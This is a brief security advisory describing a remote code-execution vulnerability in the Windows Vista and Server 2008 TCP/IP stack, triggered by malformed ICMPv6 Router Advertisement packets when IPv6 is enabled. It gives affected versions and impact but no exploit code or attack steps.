Description
The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability."

Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
